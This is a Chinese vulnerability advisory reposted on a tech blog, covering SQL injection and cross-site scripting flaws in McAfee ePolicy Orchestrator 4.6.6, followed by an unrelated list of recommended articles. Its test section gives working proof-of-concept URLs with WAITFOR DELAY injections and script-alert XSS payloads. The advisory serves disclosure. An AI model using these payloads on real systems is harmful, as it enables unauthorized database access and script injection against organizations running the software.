McAfee ePolicy Orchestrator多个SQL注入和跨站脚本漏洞

不甘 2013-07-15

发布日期:2013-07-12
更新日期:2013-07-15

受影响系统:
McAfee ePolicy Orchestrator
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61145

McAfee ePolicy Orchestrator(ePO)是一种业界领先的系统安全管理解决方案,能够帮助企业有效抵御各种恶意威胁和攻击。

McAfee ePolicy Orchestrator 4.6.6存在多个SQL注入和跨站脚本漏洞,成功利用可使攻击者执行未授权数据库操作。

<*来源:Nuri Fattah
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

SQL-injection
=============
http://www.example.com/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&amp;uid= 6waitf or%20delay&#039;0%3a0%3a20&#039;-- &amp;index=0&amp;datasourceID=&amp;orion.user.security.token=2LoWTAOfWJ4ZCjxY&amp;ajax Mode=standard HTTP/1.1

http://www.example.com/EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer &amp;uid=1;%20WAITFOR%20DELAY%20&#039;0:0:0&#039;;-- &amp;datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.query Factory %3Aquery.2&amp;index=0 HTTP/1.1

XSS:
====
http://www.example.com/core/loadDisplayType.do HTTP/1.1=20
displayType=text_lookup&amp;operator=eq&amp;propKey=EPOLeafNode.AgentVersion&amp;instanceId=&lt;script&gt;alert(182667)&lt;/script&gt;&amp;orion.user.security.token=ZCFbpCp
y3ldihsCW&amp;ajaxMode=standard

http://www.example.com/console/createDashboardContainer.do HTTP/1.1 displayType=text_lookup&amp;operator=eq&amp;propKey=EPOLeafNode.AgentVersion&amp;instanceId=&lt;script&gt;alert(182667)&lt;/script&gt;&amp;orion.user.security.token=ZCFbpCpy3ldihsCW&amp;ajaxMode=standard

http://www.example.com/console/createDashboardContainer.do HTTP/1.1 elementId=3DcustomURL.dashboard.factory3Ainstance&amp;index=3D2&amp;pageid=3D30&amp;width=3D1118&amp;height=3D557&amp;refreshInterval=3D5&amp;refreshIntervalUnit=3DMIN&amp;
filteringEnabled=3Dfalse&amp;monitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com&quot;/&gt;&lt;/iframe&gt;&lt;script&gt;alert(111057)&lt;/script&gt;&amp;orion.user.security.token=3D9BslgbJEv2JqQy3k&amp;ajaxMode=3Dstandard

http://www.example.com/ComputerMgmt/sysDetPanelBoolPie.do?uid=1&quot;;&lt;/script&gt;&lt;script&gt;alert(147981)&lt;/script&gt;&amp;orion.user.security.token=ZCFbpCpy3ldihsCW&amp;ajaxMode=standardHTTP/1.1

http://www.example.com/ComputerMgmt/sysDetPanelQry.do?uid=&lt;script&gt;alert(149031)&lt;/script&gt;&amp;orion
.user.security.token=ZCFbpCpy3ldihsCW&amp;ajaxMode=standard HTTP/1.1

http://www.example.com/ComputerMgmt/sysDetPanelQry.do?uid=&gt;&quot;&#039;&gt;&lt;script&gt;alert(30629)&lt;/script&gt;&amp;or
ion.user.security.token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(30629)&lt;/script&gt;&amp;ajaxMode=&gt;&quot;&#039;&gt;&lt;
script&gt;alert(30629)&lt;/script&gt; HTTP/1.1

http://www.example.com/ComputerMgmt/sysDetPanelSummary.do?uid=&lt;script&gt;alert(146243)&lt;/script&gt;&amp;o
rion.user.security.token=ZCFbpCpy3ldihsCW&amp;ajaxMode=standard HTTP/1.1


http://www.example.com/ComputerMgmt/sysDetPanelSummary.do?uid=&gt;&quot;&#039;&gt;&lt;script&gt;alert(30565)&lt;/script
&amp;orion.user.security.token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(30565)&lt;/script&gt;&amp;ajaxMode=&gt;&quot;&#039;&gt;&lt;script&gt;alert(30565)&lt;/script&gt; HTTP/1.1

建议:
--------------------------------------------------------------------------------
厂商补丁:

McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mcafee.com/

不甘

不甘

相关推荐

FreeMarker &amp; Mybatis &amp; Basic OGNL expressions

Basic OGNL expressions

cuterabbitbaby / 0评论 2020-05-12

iOS开发集成支付宝支付、支付宝&amp;微信支付

支付宝&微信支付:。微信分享&微信支付

定格 / 0评论 2019-12-19

页首Html代码-时钟2

<object type="application/x-shockwave-flash" style="outline:none;" data="http://cdn.abowman.com/widg

代码哥0 / 0评论 2019-10-27

TensorFlow最新应用&amp;资源集锦

深度学习正在成为企业和高校的热门研究领域之一。去年,谷歌开源了其深度学习库TensorFlow,正被广泛应用于深度学习产品中。谷歌最近又发布了一个新的TensorFlow图像识别库 ——Slim。TF-Slim是TensorFlow的一款轻量级的生成、训练

minushuang / 0评论 2016-11-30

wwww4t

(src|SRC)=[\"\']([^>》]*?)[\"\'][^》]*?>";intstartIndex=bodyMatcher.start();intendIndex=bodyMatcher.end();Str

lamp / 0评论 2013-06-12

程序猿修仙之路--算法之直接插入排序

空间复杂度排序算法的额外内存开销和运行时间同等重要。直接插入排序是一种稳定的排序算法。交换次数对于长度为N的主键不重复的列表,插入排序平均情况下需要n/4次交换,最坏情况下需要n/2次交换,最好情况下需要0次交换。假如列表的很大一部分元素是有序的,插入排序

sxyyu / 0评论 2019-07-01

无线页面加速解决方案-AMP

AMP在国内应该很少有人接触得到,今天介绍一个比较冷门的,有条件的方便使用的前端无线页面框架。AMP特点AMP是Google与2015年9月推出的一个开源的,移动端页面加速解决方案。是Google生态的一环,主要有一下特点:。AMP制定了一些严格的页面编写

鱼目混杂的IT世界 / 0评论 2019-06-28

获取请求后面参数

号url=url.substr(1);if(url.length&gt;0){vararr=url.split(&quot;&amp;&quot;);for(vari=0;i0&amp;&amp;keyVal

代码哥0 / 0评论 2016-08-15

java --运用hhs 框架,tomcat 访问mysql 数据库 连接 失败后,自动 重新连接怎么做?

useUnicode=true&amp;characterEncoding=utf8&amp;autoreconnect=true"p:username="pic"

shouen / 0评论 2011-01-26

AMP HTML 页面初探- Hello , Accelerated Mobile Page

AMP已经出来很久了,最近看到官方说12月会在北京上海有路演,才想起自己好久没接触这个AMP了,之前为了试一试,把自己博客的about页面改成了AMP页面,当时还在上线前后用了google developer toos - pagespeed 测了下速,确

lamp / 0评论 2019-06-26

Unity3D使用C#实现Coroutines & Yield

Coroutines & Yield是Unity3D编程中重要的概念,它可以实现将一段程序延迟执行或者将其各个部分分布在一个时间段内连续执行,但是在Javascript与C#中实现Coroutines & Yield,在语法上却有一些区别:

shengyingwang / 0评论 2010-04-16

s:url传多参数出现&amp问题

Struts2标签中用s:url传多参数,发现参数传不到后台,后来将url打印出来,原来在url上多了一个&amp这个问题,修改方案:如果传1个参数以上时,需要将s:url标签中的escapeAmp属性设置为false就可以了

ggggde / 0评论 2012-04-19

style

<astyle="background:url(&quot;http://im.bizapp.qq.com:8000/zx_qq.gif&quot;)no-repeatscroll0%0%transparent;displa

shengyingwang / 0评论 2011-06-14

innerHTML 和 appendchild 的区别

x.innerHTML="<ahref='http://baidu.com'>&amp;百度&amp;</a>";//在页面显示为链向百度的"&百度&"超链接

代码哥0 / 0评论 2011-04-25

JQuery 5个小技巧

returnfalse;});});varcurrent=this.css('color');this.animate({color:'rgb('+color+')'},duration/2);this.animate({color:current},du

lamp / 0评论 2011-02-28

常用的js函数处理

};};returnthis.replace(/(^\s*)|(\s*$)/g,"");returnthis.replace(/(^\s*)/g,"");returnthis.replace(/(\s*$)/g,&q

OneGit / 0评论 2011-02-28

对于URL连接删除一个参数

Stringencode="<ahref=\"http://baidu.com/?Stringregex="<ahref=['\"]?http:[/\\\\]{2}(?!((baidu\\.com)|(b

yangfanxing / 0评论 2012-08-23

类型转换运算符 运算符重载 operator new operator delete

函数原型:operator 类型名();

lamp / 0评论 2018-08-01

DeepMind首次披露旗下AI专利申请情况,引发热议

谷歌旗下的人工智能研究公司 DeepMind 近年来提交了一系列国际专利申请,这些申请现已首次公布。这些申请涉及现代机器学习的一些基本方面,因此对任何从事商业化人工智能领域的人都具有潜在的意义。此消息一经公开,就在 reddit 网站上引发热议。DeepM

AI启蒙研究院 / 0评论 2018-06-09

linux中的&&和&,|和||

&amp; 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server &amp;&amp;&amp; 表示前一条命令执行成功时,才执行后一条命令 ,如 echo ‘1‘ &amp;&

lamp / 0评论 2019-03-20

用Python爬下淘宝上面几万条数据,聊聊淘宝上飞机杯的故事

在进行简单数据处理后,看看发现了什么?竟然在10-20元有这么多商品,哇,难以想象。名器男用自慰器撸飞机杯 9.80。12429人付款夹吸全自动飞机杯 79.00。12699人付款全自动飞机杯 48.00。13572人付款免提飞机杯 49.00。13475

albertjone / 0评论 2018-07-30

利用Python开发王者荣耀,一路直奔上王者

王者荣耀 -很火的手游-简直老少通吃-令人发指-虽然操作简单-但为什么你还是会被虐, 其实 是有技巧的--本文利用Python带你研究王者荣耀各类英雄的出装小技巧,让你成为大神般的存在。from urllib.request import urlretri

OneGit / 0评论 2018-05-31

大牛程序员利用Python开发王者荣耀带妹神器,一路直奔上王者

王者荣耀 -很火的手游-简直老少通吃-令人发指-虽然操作简单-但为什么你还是会被虐, 其实 是有技巧的--本文Python大神带你研究王者荣耀各类英雄的出装小技巧,让你成为大神般的存在

ggggde / 0评论 2019-04-06

何为Metal in iOS

用一句話說 什麼事 metal ?他可以幫我們有效的減少CPU的負擔,這也就是 metal 的作用,他在我們所有的圖形顯示的底層,比方說 coreAnimation, coreImage, sprictKit, sceneKit.當然啦 這些不是我們今天要

ggggde / 0评论 2017-09-06

计算机专业术语对照

&amp;middot; Acyclic Dependencies Principle,非循环依赖原则。&amp;middot; ADSL,Asymmetrical Dingital Subscriber Loop,非对称数字用户环线。&a

DearBigTiger / 0评论 2017-07-26

EllisLab ExpressionEngine Core多个SQL注入漏洞(CVE-2014-5387)

受影响系统:EllisLab ExpressionEngine Core <= 2.9.0EllisLab ExpressionEngine Core描述:BUGTRAQ ID: 70875CVE ID: CVE-2014-5387. EllisLa

fatfat / 0评论 2014-11-04

Google 放权,让 AMP 框架采用开放治理的模式

本周二,Google 宣布将邀请其他业内人士成立“加速移动页面”开源项目的“技术指导委员会”和的咨询委员会个工作小组,通过一个更开放的治理模式来开发和推广 AMP。以后不再由 Google 的内部决定 AMP 的发展,以消除外界对 AMP 的疑虑。迄今为止

ggggde / 0评论 2018-09-20

多个Netgear DGN设备远程身份验证绕过漏洞

受影响系统:Netgear DGN1000B Wireless Router <= 1.1.00.48Netgear DGN2200描述:--------------------------------------------------------

OneGit / 0评论 2013-06-05

SmartCMS SQL注入和跨站脚本漏洞

受影响系统:smartcms smartcms描述:--------------------------------------------------------------------------------BUGTRAQ ID: 56760. 灵动内

chlintin / 0评论 2012-12-04

VeriCentre多个SQL注入漏洞

受影响系统:verifone VeriCentre Web Console 2.x描述:--------------------------------------------------------------------------------BUGT

yangfanxing / 0评论 2012-11-09

bloofoxCMS多个跨站脚本执行漏洞

受影响系统:Bloofox.com bloofoxCMS 0.3.5描述:--------------------------------------------------------------------------------BUGTRAQ ID:

xiaoheizi / 0评论 2012-11-03

phpLDAPadmin “base”参数跨站脚本执行漏洞

受影响系统:phpLDAPadmin phpLDAPadmin 1.2.2不受影响系统:phpLDAPadmin phpLDAPadmin 2.0描述:----------------------------------------------------

lengxingxing / 0评论 2012-02-20

神经网络和数学之间的联系在哪里?看完你就明白

在我们了解过神经网络的人中,都了解神经网络一个有很常见的训练方法,BP 训练算法。通过 BP 算法,我们可以不断的训练网络,最终使得网络可以无限的逼近一种我们想要拟合的函数,最终训练好的网络它既能在训练集上表现好,也能在测试集上表现不错!为什么通过 BP

代码哥0 / 0评论 2017-08-07

王者荣耀铭文被人分解了怎么办? ? ? 别急手把手叫你找回铭文!

玩过王者荣耀的人都知道王者荣耀的铭文攒起来是个痛苦的过程,每个150级满级铭文都是靠自己一点一点的耐心培养出来的,如果哪一天被人融了,想要重新攒起来比练一个新号还困难,而且像新手任务,冒险模式的奖励,成就奖励,该领的都领了的。这些资源也不可再生。所以如果铭

读书有疑 / 0评论 2017-11-29